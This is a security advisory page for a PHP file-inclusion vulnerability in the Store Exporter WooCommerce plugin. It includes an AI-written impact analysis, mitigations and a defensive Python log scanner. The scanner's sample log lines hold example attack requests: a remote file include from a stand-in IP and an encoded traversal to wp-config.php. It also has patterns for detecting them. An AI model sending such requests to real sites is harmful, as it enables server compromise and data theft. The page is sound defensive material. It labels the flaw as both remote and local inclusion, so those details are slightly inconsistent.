CVE-2025-60203: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in Josh Kohlbach Store Exporter

Severity: High
Published: Thu Nov 06 2025 (11/06/2025, 15:55:04 UTC)
Source: CVE Database V5
Vendor/Project: Josh Kohlbach
Product: Store Exporter

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Josh Kohlbach Store Exporter (woocommerce-exporter) allows PHP Local File Inclusion. This issue affects Store Exporter: from n/a through <= 2.7.6.

AI-Powered Analysis

Last updated: 01/20/2026, 21:49:08 UTC

Technical Analysis

CVE-2025-60203 identifies a Remote File Inclusion (RFI) vulnerability in the Josh Kohlbach Store Exporter plugin for WooCommerce, specifically affecting versions up to 2.7.6. The vulnerability stems from improper validation and control of filenames used in PHP include or require statements, which allows an attacker to specify a remote file URL that the server will include and execute. This type of vulnerability can be exploited remotely without authentication or user interaction, making it highly accessible to attackers. Successful exploitation can lead to unauthorized disclosure of sensitive data, as the attacker can execute arbitrary PHP code or include files that expose confidential information. The CVSS v3.1 score of 7.5 reflects a high severity due to network attack vector, low attack complexity, no privileges required, no user interaction, and a significant confidentiality impact. Although no known exploits have been reported in the wild yet, the nature of the vulnerability makes it a critical concern for sites using the affected plugin. The vulnerability is particularly relevant for WooCommerce stores that rely on the Store Exporter plugin to manage data exports, as attackers could leverage this flaw to compromise the server or extract sensitive business or customer data. The vulnerability was reserved on September 25, 2025, and published on November 6, 2025, but no official patches or mitigation links have been provided at this time.

Potential Impact

For European organizations, especially those operating e-commerce platforms using WooCommerce with the Store Exporter plugin, this vulnerability poses a significant risk. Exploitation could lead to unauthorized disclosure of sensitive customer data, including personal and payment information, which would violate GDPR and other data protection regulations, potentially resulting in heavy fines and reputational damage. The ability to remotely include files without authentication increases the attack surface and risk of compromise. Attackers could also use this vulnerability as a foothold to deploy further attacks or malware within the affected infrastructure. The impact is heightened in sectors with high-value transactions or sensitive data, such as retail, finance, and healthcare e-commerce. Additionally, the disruption caused by data breaches or regulatory investigations could lead to operational downtime and loss of customer trust.

Mitigation Recommendations

European organizations should immediately audit their WooCommerce installations to determine whether the Store Exporter plugin at version 2.7.6 or earlier is in use. Until an official patch is released, organizations should consider disabling or removing the Store Exporter plugin to eliminate the attack vector. Web application firewalls (WAFs) should be configured to detect and block suspicious requests attempting to exploit file inclusion vulnerabilities, such as those carrying remote URLs in parameters that influence file includes. Implement strict input validation and sanitization on all user-supplied inputs, especially those that influence file paths or includes. Monitoring web server logs for unusual requests or errors related to file inclusion attempts can help detect exploitation attempts early. Organizations should also ensure their PHP configuration disallows remote file inclusion by disabling the allow_url_include and allow_url_fopen directives. Finally, maintain regular backups and have an incident response plan ready to address potential compromises swiftly.
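As an added defender-side example (written for this page, not code from the plugin or the advisory), here is a small Python checker for the log-monitoring recommendation above: it parses constructed Apache-style access-log lines, URL-decodes query parameters repeatedly, and flags values carrying a remote URL or PHP stream-wrapper scheme, a traversal sequence, or a null byte. The endpoint, parameter names and hosts in the sample lines are hypothetical.

```python
"""Flag access-log requests whose query values look like file-inclusion attempts."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# URL schemes and PHP stream wrappers that have no business in an include-path parameter.
REMOTE_SCHEMES = re.compile(r"^\s*(https?|ftp|php|data|expect|phar|file):", re.I)
# Apache/Nginx combined log format: the request target sits inside the quoted request line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (hypothetical hosts, endpoint and parameter names, not from the plugin).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Nov/2025:16:08:44 +0000] "GET /wp-admin/admin-ajax.php?action=example_export&format=csv HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Nov/2025:16:09:01 +0000] "GET /wp-admin/admin-ajax.php?action=example_export&template=http://203.0.113.99/t.txt HTTP/1.1" 200 77',
    '198.51.100.7 - - [06/Nov/2025:16:09:05 +0000] "GET /wp-admin/admin-ajax.php?action=example_export&template=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 77',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return (param, reason) pairs for query values that look like include abuse."""
    hits = []
    # parse_qsl already decodes one layer; decode_fully strips any further layers.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_fully(raw)
        if REMOTE_SCHEMES.match(value):
            hits.append((name, "remote-or-wrapper-scheme"))
        elif "../" in value or "..\\" in value:
            hits.append((name, "path-traversal"))
        elif "\x00" in value:
            hits.append((name, "null-byte"))
    return hits

def scan_log(lines):
    """Return (ip, target, hits) for every parsable line with a suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := suspicious_params(m["target"])):
            findings.append((m["ip"], m["target"], hits))
    return findings
```

Feed real access-log lines to scan_log and route the findings to your SIEM; separately, note that allow_url_include=Off is the directive that stops include/require of URL wrappers, while allow_url_fopen also governs plain URL reads by functions such as file_get_contents, so check other plugins before disabling it as well.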

Technical Details

Data Version: 5.2
Assigner Short Name: Patchstack
Date Reserved: 2025-09-25T15:28:42.279Z
CVSS Version: null
State: PUBLISHED

Threat ID: 690cc80cca26fb4dd2f595d0

Added to database: 11/6/2025, 4:08:44 PM

Last enriched: 1/20/2026, 9:49:08 PM

Last updated: 2/7/2026, 11:06:50 AM
